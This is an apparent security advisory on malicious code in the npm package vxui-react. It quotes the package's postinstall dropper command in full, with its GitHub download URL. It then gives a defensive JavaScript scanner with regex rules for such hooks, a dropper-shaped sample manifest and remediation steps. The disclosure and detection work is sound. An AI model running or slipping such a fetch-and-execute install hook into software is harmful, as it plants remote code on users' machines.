
MAL-2026-4793

Malicious code in vxui-react (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bde616ebc21909bfa386bf8e49438da710f48b62ae3127f2a7259c71557a4242)

package.json declares a postinstall script that runs `curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &`. On every `npm install vxui-react`, this fetches an opaque binary from a personal GitHub user (`parikhpreyash4`) unrelated to the package's publisher, with TLS verification explicitly disabled (`-k`), errors suppressed, the file staged to a hidden path masquerading as the SSH daemon (`/tmp/.sshd`), made executable, and launched detached in the background. The package advertises itself as a React UI component library; no legitimate purpose for this exists. The fetched URL is mutable (`releases/latest`), unsigned, and unverified. This is a classic install-time remote code execution dropper.
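A defender-side check for the pattern described above, as an added example that is not part of this advisory or of any scanner's own code: it reads the install-time lifecycle scripts from a package.json and reports which of the traits named in this entry each one shows. The rule ids, the `auditManifest` function, the verdict policy and both sample manifests are assumptions constructed for illustration.

```javascript
// Added example. Rule ids, verdict policy and both sample manifests are constructed.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Each rule mirrors one trait the advisory lists for the postinstall command.
const RULES = [
  { id: "remote-fetch", re: /\b(curl|wget)\b[^|;&]*https?:\/\//i },
  { id: "tls-verification-disabled",
    re: /\bcurl\b[^|;&]*\s(-[a-zA-Z]*k[a-zA-Z]*|--insecure)\b|\bwget\b[^|;&]*--no-check-certificate/ },
  { id: "mutable-latest-release", re: /\/releases\/latest\/download\// },
  { id: "hidden-file-in-tmp", re: /\/(tmp|var\/tmp|dev\/shm)\/\.[\w.-]+/ },
  { id: "errors-suppressed", re: /2>\s*\/dev\/null/ },
  { id: "chmod-executable", re: /\bchmod\s+(\+x|0?7[0-7]{2})\b/ },
  { id: "background-launch", re: /(^|[^&])&\s*$/ },
];

// Returns { verdict, findings } for the text of one package.json.
function auditManifest(manifestText) {
  let manifest;
  try { manifest = JSON.parse(manifestText); }
  catch { return { verdict: "unparseable", findings: [] }; }
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const hits = RULES.filter((r) => r.re.test(command)).map((r) => r.id);
    if (hits.length > 0) findings.push({ hook, hits, command });
  }
  // Assumed policy: a download inside an install hook blocks; other hits go to review.
  const fetches = findings.some((f) => f.hits.includes("remote-fetch"));
  const verdict = fetches ? "block" : findings.length > 0 ? "review" : "ok";
  return { verdict, findings };
}

// Constructed sample shaped like the command in this advisory (placeholder host).
const DROPPER_MANIFEST = JSON.stringify({
  name: "constructed-ui-lib",
  scripts: {
    postinstall: "curl -skL https://example.invalid/owner/repo/releases/latest/download/helper" +
      " -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &",
  },
});
// Constructed benign manifest: local build step; curl appears only in a non-install script.
const BENIGN_MANIFEST = JSON.stringify({
  name: "constructed-benign-lib",
  scripts: { postinstall: "node scripts/build.js", test: "curl -s https://example.invalid/health" },
});

console.log(auditManifest(DROPPER_MANIFEST).verdict, auditManifest(BENIGN_MANIFEST).verdict);
```

Run it over a dependency's package.json before install (for example after `npm pack` and extraction), or install with `npm install --ignore-scripts` so lifecycle hooks never execute.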


Affected packages

npm / vxui-react

No fixed version has been published yet for vxui-react (npm). Pin to a known-safe version or switch to an alternative.
